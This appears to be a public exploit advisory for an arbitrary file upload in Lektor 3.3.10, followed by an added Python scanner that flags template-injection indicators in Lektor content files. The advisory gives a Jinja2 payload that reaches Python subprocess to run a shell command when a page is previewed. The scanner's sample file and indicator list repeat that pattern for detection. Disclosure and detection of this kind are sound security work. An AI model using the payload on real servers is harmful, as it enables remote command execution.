# Exploit Title: Lektor static content management system Version: 3.3.10 Arbitrary File Upload
# Date: 20/03/2024
# Exploit Author: kai6u
# Vendor Homepage: https://www.getlektor.com/
# Software Link: https://github.com/lektor/lektor/releases/tag/v3.3.10
# Version: 3.3.10
# Tested on: Ubuntu 22.04

1) With access to the administrator console over the network, first create a contents.lr file containing the payload using Lektor's Add Page feature, specifying the templates directory as the destination. (The attacker can also upload to any other directory.)

Payload:
{{ ''.__class__.__mro__[1].__subclasses__()[276]('whoami',shell=True,stdout=-1).communicate()[0].strip()}} }}

2) Create a new page, specifying the created contents.lr as its template.

3) Use the preview function to view the sample page rendered with the specified template.
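The advisory above describes an attacker planting a Lektor content file whose Jinja expression reaches into Python internals (__class__, __mro__, __subclasses__) so that rendering it executes a command. A defender reviewing a Lektor project can detect that pattern on disk: legitimate contents.lr files and templates never need dunder attributes inside a {{ ... }} or {% ... %} block. The following scanner is an added example written for this page; it is not part of the advisory or of the Lektor project. The sample files, the path layout it walks (content/ and templates/), and the indicator list are constructed assumptions chosen to illustrate the check.

```python
"""Detect Jinja2 template-injection indicators in Lektor content files.

Added example (not part of the original advisory or the Lektor project):
a defender-side scanner that walks a Lektor project's content/ and templates/
directories and flags files whose {{ ... }} / {% ... %} blocks reference
Python internals that a legitimate page or template never needs.
"""
import re
from pathlib import Path
from typing import Dict, List

# Dunder attributes and names that have no place in a content or template file.
# The advisory's payload chains __class__, __mro__ and __subclasses__; the
# remaining entries are a heuristic list assumed for this example.
SUSPICIOUS_TOKENS = (
    "__class__", "__mro__", "__subclasses__", "__globals__", "__builtins__",
    "__import__", "__getattribute__", "subprocess", "popen", "os.system",
)

# Jinja expression {{ ... }} and statement {% ... %} blocks; DOTALL so a block
# split over several lines is still captured as one unit.
JINJA_BLOCK_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.DOTALL)


def scan_text(text: str) -> List[str]:
    """Return the suspicious tokens found inside the Jinja blocks of one file.

    Tokens that appear only in plain prose (outside any block) are ignored,
    so documentation that merely mentions __class__ is not flagged.
    """
    hits: List[str] = []
    for block in JINJA_BLOCK_RE.findall(text):
        for token in SUSPICIOUS_TOKENS:
            if token in block and token not in hits:
                hits.append(token)
    return hits


def scan_files(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan a mapping of relative path -> file text; return only files with hits."""
    findings: Dict[str, List[str]] = {}
    for path, text in files.items():
        hits = scan_text(text)
        if hits:
            findings[path] = hits
    return findings


def scan_project(root: str) -> Dict[str, List[str]]:
    """Scan the .lr and .html files under a real Lektor project directory."""
    files: Dict[str, str] = {}
    for pattern in ("content/**/*.lr", "templates/**/*.html", "templates/**/*.lr"):
        for p in Path(root).glob(pattern):
            files[str(p.relative_to(root))] = p.read_text(errors="replace")
    return scan_files(files)


# Constructed sample files standing in for a Lektor project tree.
SAMPLE_FILES = {
    # A normal page: the Jinja in it only prints a field.
    "content/about/contents.lr": "title: About\n---\nbody: Hello {{ this.title }}\n",
    # A file planted in templates/ following the shape of the advisory's payload
    # (constructed sample: harmless command string, illustrative index).
    "templates/contents.lr": (
        "{{ ''.__class__.__mro__[1].__subclasses__()[0]"
        "('id',shell=True,stdout=-1).communicate()[0] }}\n"
    ),
    # Dunder text outside a Jinja block is plain content and is not flagged.
    "content/docs/contents.lr": "body: Python's __class__ attribute explained.\n",
}


if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(hits)}")
```

Run against a real project with scan_project("/path/to/lektor-project") from a cron job or a pre-deploy hook; any hit in templates/ or content/ warrants a look at who wrote the file and through which admin session, since the admin console itself is the upload path the advisory relies on.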